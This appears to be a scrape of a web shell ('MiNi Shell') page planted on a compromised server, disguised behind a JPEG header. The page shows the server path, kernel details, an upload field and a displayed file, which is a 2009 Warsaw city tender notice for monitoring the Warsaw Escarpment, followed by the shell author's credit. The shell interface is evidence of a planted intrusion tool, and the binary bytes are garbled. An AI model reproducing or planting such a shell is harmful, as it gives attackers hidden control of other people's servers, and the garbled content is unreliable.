JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090720/115841-N-2009.html

<p class="kh_header"><b>Warszawa: Wykonanie monitoringu trzech fragmentów Skarpy Warszawskiej</b><br>
<b>Numer ogłoszenia: 115841 - 2009; data zamieszczenia: 20.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa , Pl. Bankowy 3/5, 00-950 Warszawa, woj. mazowieckie, tel. (+48 22) 443 14 00, faks (+48 22) 50 50 673.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.warszawa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie monitoringu trzech fragmentów Skarpy Warszawskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zaprojektowanie i założenie systemu wieloletniego monitorowania stabilności Skarpy Warszawskiej na wytypowanych odcinkach, o największym stopniu zagrożenia ruchami masowymi ziemi, tzn. w rejonie Starego Miasta (od ulicy Kościelnej do klasztoru Sióstr Wizytek), w rejonie ulicy Myśliwieckiej i w sąsiedztwie kościoła p. w. Św. Katarzyny, a także do kontroli wytypowanych budynków i budowli, usytuowanych w ww. rejonach w strefie objętej ruchami Skarpy, w szczególności:
a) Zaprojektowanie i wdrożenie numerycznego systemu gromadzenia i przetwarzania danych pomiarowych wraz z ich odpowiednią prezentacją;
b) Wykonanie wyjściowej (zerowej) obserwacji w założonej sieci punktów pomiarowych, opracowanie algorytmów obliczeniowych i matematycznie ścisłe wyrównanie wyników liczbowych pomiarów;
c) Przygotowanie schematów do geologicznej i geotechnicznej interpretacji danych, uzyskanych z pomiarów geodezyjnych, o okresowych przemieszczeniach punktów kontrolnych osadzonych w gruncie oraz badanych budynkach i budowlach (obiektach stałych);
d) Opracowanie i wdrożenie, przy współudziale właściwych jednostek organizacyjnych Urzędu miasta stołecznego Warszawy, efektywnego systemu stałej ochrony przed zniszczeniem znaków pomiarowych w sieci monitorującej przemieszczenia na terenie Skarpy;
e) Wykonanie w kolejnych latach cyklicznych obserwacji w sieci punktów pomiarowych wraz z obliczeniem wielkości przemieszczeń i ich interpretacją geotechniczną..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.71.15.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane wadium - 15 000 zł. Uwaga! Wadium nie wnosi się przy składaniu wniosków. Do wniesienia wadium zobowiązani będą jedynie wykonawcy zaproszeni do składania ofert ostatecznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.1. spełniają warunki określone w art. 22 ust. 1 ustawy;
1.2. w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali przynajmniej 2 opracowania w zakresie projektowania sieci pomiarowej do monitorowania terenów zagrożonych osuwaniem się mas ziemnych wraz z analizą geotechniczną zaobserwowanych ruchów budynków, budowli, reperów gruntowych lub inklinometrów, na tle geologicznej budowy i własności geotechnicznych gruntu, każde o wartości nie mniejszej niż 30 000 zł.;
1.3. w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali przynajmniej 2 opracowania w zakresie projektowania i tworzenia baz danych w środowisku GIS oraz w modelowaniu przestrzennym, każde obejmujące obszar nie mniejszy niż 40 000 m2.
1.4. Dysponują przynajmniej 4 osobowym zespołem osób zdolnym do wykonania zamówienia, w którym:
1.4.1. przynajmniej 1 osoba posiada uprawnienia w dziedzinie geodezji i kartografii w zakresie 1 - geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne, wydane na podstawie art. 45 ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. 2005 r. Nr 240, poz. 2027 ze zm.);
1.4.2. przynajmniej 1 osoba posiada uprawnienia w dziedzinie geodezji i kartografii w zakresie 4 - geodezyjna obsługa inwestycji, wydane na podstawie art. 45 ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. 2005 r. Nr 240, poz. 2027 ze zm.);
1.4.3. przynajmniej 2 osoby posiadają kwalifikacje do wykonywania, dozorowania i kierowania pracami geologicznymi kategorii VI lub VII, wydanymi na podstawie ustawy z dnia 4 lutego 1994 r. Prawo geologiczne i górnicze (Dz. U. z 2005 r. Nr 228, poz. 1947 ze zm.).
2. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów, zawartych w złożonym przez Wykonawcę wniosku, na potwierdzenia ich spełnienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykaz oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu:
a)	oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu;
b)	dokument potwierdzający dopuszczenie Wykonawcy do obrotu prawnego - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków;
c)	wykaz należycie wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej 2 opracowań w zakresie projektowania sieci pomiarowej do monitorowania terenów zagrożonych osuwaniem się mas ziemnych wraz z analizą geotechniczną zaobserwowanych ruchów budynków, budowli, reperów gruntowych lub inklinometrów, na tle geologicznej budowy i własności geotechnicznych gruntu, każde o wartości nie mniejszej niż 30 000 zł;
d)	wykaz należycie wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie przynajmniej 2 opracowań w zakresie projektowania i tworzenia baz danych w środowisku GIS oraz w modelowaniu przestrzennym, każde obejmujące obszar nie mniejszy niż 40 000 m2.
e)	dokumenty (np. referencje) potwierdzające, że usługi wyszczególnione w wykazach, o których mowa w pkt 1 lit. c) i d) zostały wykonane należycie;
f)	wykaz osób zdolnych do wykonania zamówienia, o których mowa w sekcji III.2) pkt 1.4.1., 1.4.2. oraz 1.4.3. 
g)	w przypadku gdy Wykonawca sam nie dysponuje osobami zdolnymi do wykonania zamówienia, do wykazu należy załączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia wymienionych w wykazie, o którym mowa w pkt 1 lit. f);
2. Zamawiający zaprosi do złożenia oferty wstępnej Wykonawców spełniających warunki udziału w postępowaniu w liczbie nie większej niż 4. W przypadku, gdy więcej niż 4 Wykonawców spełni warunki udziału w postępowaniu zawarte w niniejszym ogłoszeniu, Zamawiający zaprosi do złożenia oferty tych 4 z nich, którzy uzyskają najwyższą liczbę punktów, wg zasady :
a) za każde opracowanie, o którym mowa w sekcji III.2) pkt 1.2. w zakresie projektowania sieci pomiarowej do monitorowania terenów zagrożonych osuwaniem się mas ziemnych wraz z analizą geotechniczną zaobserwowanych ruchów budynków, budowli, reperów gruntowych lub inklinometrów, na tle geologicznej budowy i własności geotechnicznych gruntu, każde o wartości nie mniejszej niż 30 000 zł - 10 pkt;
b) za każde opracowanie, o którym mowa w w sekcji III.2) pkt 1.3. w zakresie projektowania i tworzenia baz danych w środowisku GIS oraz w modelowaniu przestrzennym, każde obejmujące obszar nie mniejszy niż 40 000 m2  - 10 pkt;
c) za każdą osobę zdolną do wykonania zamówienia, o których mowa w sekcji III.2) pkt 1.4.1., 1.4.2. oraz 1.4.3. - 1 pkt;
d) w przypadku uzyskania jednakowej ilości punktów decydować będzie łączna wartość wykazanych opracowań, o których mowa w sekcji III.2) pkt 1.2 ogłoszenia.
3. Wykonawca zagraniczny
3.1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1  lit. b), składa dokument lub dokumenty wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono jego upadłości, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania wniosków.
3.2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o którym mowa w pkt 3.1. oraz w pkt 1 lit. b), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania wniosków.
4.	Wniosek składany wspólnie
4.1.	Zamawiający dopuszcza możliwość składania wniosku przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) pod warunkiem, że taki wniosek spełniać będzie następujące wymagania: 
4.1.1.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.
4.1.2.	Pełnomocnictwo oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza powinno być załączone do wniosku i zawierać w szczególności wskazanie:
a)	postępowania o zamówienie publiczne, którego dotyczy,
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,
c)	ustanowionego Pełnomocnika oraz zakresu jego umocowania. 
4.1.3.	Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
4.1.4.	Stosowne odpisy z rejestru bądź ewidencji (pkt 1 lit. b) muszą zostać dołączone do wniosku dla wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia.
4.1.5.	W odniesieniu do warunków określonych w art. 22 ust. 1 pkt 1, 2 i 3 Ustawy wymagania te muszą być spełnione wspólnie przez Wykonawców (suma wymagań określonych przez Zamawiającego w tym zakresie), na ich potwierdzenie należy złożyć dokumenty określone w pkt 1 lit. c), d), e) f) i g).
4.1.6.	Oświadczenia, formularze, dokumenty składa i podpisuje w imieniu wszystkich Wykonawców, Pełnomocnik wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających wniosek wspólny.
4.1.7.	Wszystkie kserokopie dokumentów załączone do wniosku muszą być opisane za zgodność z oryginałem i podpisane przez Pełnomocnika lub wszystkich Wykonawców.
4.1.8.	Wszelka korespondencja oraz rozliczenia dokonywane będą przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu wniosku.

5. Wymogi formalne dotyczące składanych dokumentów
a)	wniosek, wykaz oraz oświadczenie - pod rygorem uznania za nieważne - muszą zostać sporządzone w języku polskim z zachowaniem formy pisemnej np.: na maszynie do pisania, komputerze lub ręcznie długopisem czytelnym pismem oraz podpisane przez osoby uprawnione do składania oświadczeń woli w imieniu Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w dokumencie rejestrowym lub innym dokumencie, właściwym dla formy organizacyjnej;
b)	w przypadku, gdy Wykonawcę reprezentuje pełnomocnik do wniosku musi być załączone pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy, w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza;
c)	pozostałe oświadczenia i dokumenty należy załączyć w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę lub właściwą(e) osobę(-y) upoważnioną(-e) do reprezentacji danego Wykonawcy w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem)
d)	Dokumenty sporządzone w języku obcym, muszą być składane wraz z ich tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
6. Wzory formularzy: wniosku, oświadczenia i wykazów można pobrać ze strony internetowej: http://ogloszeniabzp.um.warszawa.pl/wyszukiwarka.php, jak również uzyskać w siedzibie Biura Zamówień Publicznych Urzędu m. st. Warszawy, ul. Senatorska 36, 00-095 Warszawa, piętro IV, pokój nr 17, u Pani Ewy Górskiej (tel.:022/ 443 14 14 fax: 022/ 50-50-673) w dni robocze w godz.: 8.00÷16.00 lub otrzymać faksem, pocztą lub pocztą elektroniczną e-mail: egorska@um.warszawa.pl na wniosek Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 4.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> Wzór wniosku z zał. można pobrać ze strony http://ogloszeniabzp.um.warszawa.pl/wyszukiwarka.php.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wzór wniosku z zał. można uzyskać w Biurze Zamówień Publicznych, ul. Senatorska 36, 00-095 Warszawa, p.IV, pok.17, lub faksem lub pocztą lub e-maliem egorska@um. warszawa.pl na wniosek wykonawcy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2009 godzina 10:00, miejsce: Biuro Zamówień Publicznych, ul. Senatorska 36, 00-095 Warszawa, p.IV, pok.17.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do kontaktu z Wykonawcami są: a) w zakresie przedmiotu zamówienia: Pani Dorota Jedynak (BOŚ) tel.: 0-22 257-92-83; b) w zakresie formalno - prawnym: Pani Ewa Górska  (BZP),  tel.: (0-22) 443-14-14. Zamawiającym jest Miasto Stołeczne Warszawa, w imieniu którego postępowanie prowadzi Biuro Ochrony Środowiska (BOŚ) Urzędu m.st. Warszawy we współpracy z Biurem Zamówień Publicznych (BZP) Urzędu m.st. Warszawy. Wszelką korespondencję do Zamawiającego związaną z niniejszym postępowaniem należy kierować na adres:

Creat By MiNi SheLL
Email: jattceo@gmail.com